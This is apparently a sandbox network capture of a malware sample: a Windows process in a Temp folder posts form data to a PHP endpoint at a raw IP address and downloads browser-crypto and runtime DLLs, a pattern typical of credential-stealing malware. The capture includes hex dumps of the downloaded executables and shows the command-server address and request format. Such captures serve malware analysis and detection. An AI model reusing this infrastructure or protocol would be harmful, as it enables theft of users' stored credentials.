Dec 19, 2024 10:10:57.592138052 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:10:57 GMT Content-Type: application/octet-stream Content-Length: 3286016 Last-Modified: Wed, 18 Dec 2024 13:43:08 GMT Connection: keep-alive ETag: "6762d16c-322400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 88 cf 56 f4 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 50 00 00 c8 2f 00 00 5a 02 00 00 00 00 00 ce e6 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 32 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 80 e6 2f 00 4b 00 00 00 00 00 30 00 40 57 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 32 00 0c 00 00 00 33 e6 2f 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELVP/Z/ 0@ 2@/K0@W`23/ H.text/ / `.rsrc@W0X/@@.reloc`2"2@B/H@C@z6+(B99(:+(^A(!(*(0(8yEcO/8^s :&8s8s 9& 8s 8s800000**00**
Dec 19, 2024 10:10:57.592252970 CET	1236	IN	Data Raw: 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 22 00 14 a5 2e 00 00 01 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 2a 0c 00 Data Ascii: 0".**(~(s;(=t80*0(00*0
Dec 19, 2024 10:10:57.592292070 CET	1236	IN	Data Raw: 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a Data Ascii: *******************************
Dec 19, 2024 10:10:57.592349052 CET	1236	IN	Data Raw: 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 2a 0c 00 06 2a 00 1a 28 2a 0c 00 06 2a 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 Data Ascii: 0**((*0**(*"r***(**0
Dec 19, 2024 10:10:57.592385054 CET	896	IN	Data Raw: 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a Data Ascii: **********0e********"r***
Dec 19, 2024 10:10:57.592422962 CET	1236	IN	Data Raw: 2a 41 1c 00 00 02 00 00 00 34 00 00 00 83 01 00 00 b7 01 00 00 0d 00 00 00 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 01 10 00 00 02 00 30 00 14 44 00 40 00 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a Data Ascii: A400D@*""""r*"*""r
Dec 19, 2024 10:10:57.592458010 CET	1236	IN	Data Raw: 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 2a 0c 00 06 2a 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 Data Ascii: 0*(00*(00"-*0ALB*
Dec 19, 2024 10:10:57.592495918 CET	1236	IN	Data Raw: 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 2a 0c 00 06 2a 00 12 00 00 00 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a Data Ascii: 0*(**"(*0004O70*^}
Dec 19, 2024 10:10:57.592531919 CET	1236	IN	Data Raw: 00 3b 00 00 00 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 1c 00 00 02 00 00 00 77 01 00 00 b2 02 00 00 29 04 00 00 13 00 00 00 00 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 05 00 04 00 00 00 00 00 00 00 00 Data Ascii: ;0Aw)00*0X( 8Eq8 :&8*~: 9& 8~ 8
Dec 19, 2024 10:10:57.592567921 CET	896	IN	Data Raw: 3a ab ff ff ff 26 20 00 00 00 00 38 a0 ff ff ff 7e f9 00 00 04 80 f6 00 00 04 20 01 00 00 00 17 3a 8b ff ff ff 26 38 81 ff ff ff 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a Data Ascii: :& 8~ :&80******00*******00*0
Dec 19, 2024 10:10:57.712743998 CET	1236	IN	Data Raw: 00 0f 00 00 00 00 00 00 00 02 00 00 00 28 00 00 00 13 01 00 00 3b 01 00 00 0e 00 00 00 00 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 04 00 ac 00 00 00 69 00 00 11 28 2a 0c 00 06 Data Ascii: (;0**0i( 8E`H+8[ <#($ #($o] 87 :& 8sY 9&8 "($ 0#($o]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	50035	185.215.113.206	80	4132	C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:10:59.358814955 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFBAAFHDHCBGCAKFHDAK Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="file"------BFBAAFHDHCBGCAKFHDAK--
Dec 19, 2024 10:11:00.964801073 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 19, 2024 10:11:03.005013943 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 19, 2024 10:11:03.537883997 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:03 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Dec 19, 2024 10:11:03.537909985 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
Dec 19, 2024 10:11:03.537924051 CET	1236	IN	Data Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh\|$,}uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$
Dec 19, 2024 10:11:03.538059950 CET	1236	IN	Data Raw: 55 89 e5 53 57 56 83 ec 24 8b 4d 1c 8b 75 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 7d 08 8d 59 f8 83 f9 10 75 32 8d 45 dc 8d 4d e0 6a 10 ff 75 18 6a 10 50 51 57 e8 f7 93 06 00 83 c4 18 89 c7 8d 75 e8 83 45 dc f8 c7 45 d8 00 00 00 00 85 ff 0f 85 b4 01 Data Ascii: USWV$Mu01E}Yu2EMjujPQWuEEC1;]vS{EE1uuSPVEPo9]SUYY)ZYEME]M)19D
Dec 19, 2024 10:11:03.538072109 CET	1236	IN	Data Raw: 00 00 00 0f 57 c8 0f 11 8c 0e 9c 00 00 00 83 c1 20 83 c3 fe 75 a6 eb 02 31 c9 f6 c2 01 74 28 0f 10 04 0f 0f 10 4c 0e 0c 0f 57 c8 0f 10 84 0e 8c 00 00 00 0f 11 4c 0e 0c 0f 10 0c 0f 0f 57 c8 0f 11 8c 0e 8c 00 00 00 31 db 8b 55 ac 39 c2 74 6b f6 c2 Data Ascii: W u1t(LWLW1U9tkt0T0U19t<f.0L0L0LL09uM17L^_[]USWVh1
Dec 19, 2024 10:11:03.538081884 CET	1236	IN	Data Raw: f0 8d 86 00 ff ff ff 3d 00 ff ff ff 77 0a 68 0e e0 ff ff e9 d0 00 00 00 8b 45 08 85 c0 0f 84 c0 00 00 00 8d 9d f0 fe ff ff 68 00 01 00 00 68 20 21 08 10 50 e8 28 f9 07 00 83 c4 0c bf 00 01 00 00 0f 1f 80 00 00 00 00 56 ff 75 0c 53 e8 0f f9 07 00 Data Ascii: =whEhh !P(VuS)9wWuSufDT>\>=t%>>f1h
Dec 19, 2024 10:11:03.538096905 CET	776	IN	Data Raw: 45 d0 0f 84 a4 00 00 00 89 55 e0 89 5d dc 8b 45 ec 04 01 89 4d d4 0f b6 c8 8a 5d e8 8b 55 f0 8a 24 0a 00 e3 0f b6 f3 8b 55 f0 8a 3c 32 8b 55 f0 88 3c 0a 8b 55 f0 88 24 32 00 e7 0f b6 f7 8b 4d 10 8a 21 8b 4d f0 32 24 31 8b 4d d4 8b 55 e4 88 22 ba Data Ascii: EU]EM]U$U<2U<U$2M!M2$1MU")UtDEU$U<2U<U$2MaM2$1MUbu-]En~uMMUEEM]}7
Dec 19, 2024 10:11:03.538109064 CET	1236	IN	Data Raw: c7 04 8b 4d c4 d3 e8 89 45 e0 8b 4d ec 8b 45 d0 8a 55 e8 e9 78 01 00 00 c7 45 e0 00 00 00 00 8a 55 e8 8b 4d ec e9 66 01 00 00 c7 45 e0 00 00 00 00 8b 4d ec 8a 55 e8 e9 54 01 00 00 0f b6 46 01 c1 e0 08 09 c1 83 fa 02 74 09 0f b6 46 02 c1 e0 10 09 Data Ascii: MEMEUxEUMfEMUTFtFMUEM)ffo 1ffo fuEfn,0fnd0ff`faf`fafrfo5 f[fpffpfpffpfbffrf
Dec 19, 2024 10:11:03.538348913 CET	1236	IN	Data Raw: 89 c2 8b 45 d0 89 75 d8 3b 75 c8 0f 83 c7 fe ff ff 8b 55 ec 01 ca 01 cf 01 4d dc 83 7d d8 00 0f 85 c4 fc ff ff 8b 45 f0 88 90 00 01 00 00 88 98 01 01 00 00 e9 74 fe ff ff 89 f8 89 cf 83 7d d8 00 0f 85 fd fd ff ff 8b 45 f0 89 f9 88 88 00 01 00 00 Data Ascii: Eu;uUM}Et}EPEE},7,7E@2CM.USWV\2tRAA q$]
Dec 19, 2024 10:11:03.546483040 CET	1236	IN	Data Raw: 18 ff ff ff 8b 75 b4 01 ce 8b 48 44 89 8d 34 ff ff ff 8b 55 c8 11 ca 8b bd 60 ff ff ff 01 fe 89 75 b4 13 55 98 31 d3 89 5d 94 89 d3 8b 85 64 ff ff ff 31 f0 89 85 64 ff ff ff 8b 4d ec 03 4d 94 89 4d ec 8b 55 e0 11 c2 89 55 e0 31 cf 8b 75 98 31 d6 Data Ascii: uHD4U`uU1]d1dMMMUU1u1tpH8}pLE]d1]1U]uuEE11E}tBP`MBTD]H
Dec 19, 2024 10:11:03.546502113 CET	1236	IN	Data Raw: c3 31 ca 89 d8 0f a4 d0 08 0f a4 da 08 8b 75 b8 03 b5 74 ff ff ff 8b 5d f0 13 9d 50 ff ff ff 01 d6 89 75 b8 11 c3 89 5d f0 8b 4d a8 31 d9 31 f7 89 fe 0f a4 ce 10 89 b5 58 ff ff ff 0f ac cf 10 89 bd 78 ff ff ff 8b 5d ec 01 fb 89 5d ec 8b 4d e0 11 Data Ascii: 1ut]Pu]M11Xx]]MM11\|}$E\]}UEM1Mu1}}EE11}0M,}M1M1u
Dec 19, 2024 10:11:05.143446922 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 19, 2024 10:11:05.600569010 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:05 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Dec 19, 2024 10:11:06.674666882 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 19, 2024 10:11:07.114475965 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:06 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Dec 19, 2024 10:11:08.122792006 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 19, 2024 10:11:08.559391975 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:08 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Dec 19, 2024 10:11:16.734078884 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 19, 2024 10:11:17.171550989 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:16 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Dec 19, 2024 10:11:18.011339903 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 19, 2024 10:11:18.448801994 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:18 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Dec 19, 2024 10:11:19.442512989 CET	202	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDG Host: 185.215.113.206 Content-Length: 947 Connection: Keep-Alive Cache-Control: no-cache
Dec 19, 2024 10:11:20.398195028 CET	202	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
